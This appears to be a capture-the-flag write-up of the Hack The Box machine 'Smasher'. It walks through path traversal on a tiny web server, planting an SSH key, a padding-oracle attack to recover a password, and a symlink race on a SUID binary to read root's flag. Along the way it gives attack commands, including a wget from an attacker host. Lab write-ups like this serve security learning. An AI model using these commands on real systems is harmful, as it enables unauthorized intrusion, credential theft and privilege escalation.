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 ·  ☕ 4 min read  ·  ✍️ M4t35Z
Name Smasher
OS Linux
Points Insane(50)

Basic Recon

Interesting ports are: 1111(shenfeng tiny-web-server) and 22


Port 1111 is some type of web server so lets check it out!
We only got a dirlisting and there is only 1 file index.html.

Just go there :D

Its a login page but the button does nothing :/

More advanced recon on web!

Just open burp, refresh the page, go to http history and look for the response.
If u got it just open it!

This box runs a shenfeng tiny-web-server just search for it on the net!
The first link that ddg gave us is the source on github!
Source codes are usually juicy stuff :D
Clone the git repo! And start investigating the source! Btw there is a lil info in the from github!

Lets try to reach an lfi!
Firstly, I tried on the dirlisting page from my web browser(http://ip:1111/../../../etc/passwd) but it didnt work. :(
Lets try with burp! Just send the req to repeater and put some ../’s after the GET word than the etc/passwd!


We have an lfi, whats next?

We know there are 3 users with shell on the box root, www, and smasher!
If we provide less ../ and no /etc/passwd we got dir listing on the server!

Enum where we are and what we could see!

What we know

We are in:
/<something>/www/tiny-web-server/ and the something is /home for sure cuz user www has a shell and a home dir too.
Btw we could check it with the ../../../../home GET parameter. And as I said we got www/

We could find the system version in /etc/lsb_release and /etc/debian_version and /etc/os-release and /etc/hostname :

We could donload the binary too!

nc -nv 1111 > tiny

Now, just make a GET req in nc!

GET ../../../../home/www/tiny-web-server/tiny

Get rid of the http bullshit from the beginning with vim and then run file tiny
We got its an elf binary.

Exploiting the binary

U have to do it manually :D
Idk this type of magic :
Fully working exploit that I grabbed from snowscan’s smasher writeup:

Just run it!

WE ARE IN as user www!!
Now we need a normal shell so just paste our publickey to ~/.ssh/authorized_keys!
First, generate one:

ssh-keygen -t rsa -b 4096

Now just copy to the victim!


ssh -i ~/.ssh/id_rsa www@

And we are in with ssh(a much handy shell to work with)!


Just download to the box!
Run it!

  • There is an interesting cron job(but it’s commented out :/)!

  • Port 1337 listening on localhost

    nc 1337

    And we got an AES hash:


Oracle padding

I will use this script to get smasher’s pw with a padding oracle attack.
It uses the paddingoracle python lib so install it with pip!

pip install paddingoracle --user

We also have to tunnel the 1337 port!

ssh -L 1337:localhost:1337 -i ~/.ssh/id_rsa www@

Now, just run the script like a 1337 H4x0r!

python expl/ -b 16 'irRmWB7oJSMbtBC4QuoB13DC08NI06MbcWEOc94q0OXPbfgRm+l9xHkPQ7r7NdFjo6hSo6togqLYITGGpPsXdg==' -p 1337

Get a coffe, stand up do anything u can do while it’s cracking the hash!

Finally, we got it (start: 16:56, end: 17:12 (after ~16 min))


SSH in as smasher with the pw we got!


Privesc to root

Run linpeas again!

This is a more interesting cronjob! It runs ~/ every minute (I think)


#!/usr/bin/env bash
while true; do socat TCP-LISTEN:1337,reuseaddr,fork,bind= EXEC:"/usr/bin/python /home/smasher/" 2>&1 > /dev/null; done

But the big problem is that we do not have permission to write into these files :(

Search for more weird stuff!
Check for suid bins inside a bin dir on the system!

find / -perm /6000 2>/dev/null | grep 'bin'

There a weird suid binary /usr/bin/checker
Try to run it! It needs a file to check so create one with some random string in it!

If u run the binary u can feel there is a ~second delay so maybe we can trigger a race condition!


liveoverflow’s vid about race conditions
my racing source

Compile it, send it to the box and run it!

mkdir /tmp/.ayy
cd /tmp/.ayy
wget <attacker-ip>/racing
ln -s /root/root.txt /tmp/.ayy/flag
touch dummy

Now, u can do an ls -lah and u must see these:

./racing /tmp/.ayy/flag /tmp/.ayy/dummy

And open a new ssh and try to use checker on /tmp/.ayy/flag!

–> It’s not working :(

The simple way

Go back and do it more simple cuz we have 1 sec!
We just need fast fingers and 2 terminal window!

Make it work:

  1. Run checker
  2. Fastly change to the other window
  3. Link the rootflag to a file

If u are fast enough u will get the flag :D


U can also do it with a script:


rm /tmp/.ayy/flag
touch /tmp/.ayy/flag
/usr/bin/checker /tmp/.ayy/flag &
sleep 0.5
ln -sf /root/root.txt /tmp/.ayy/flag

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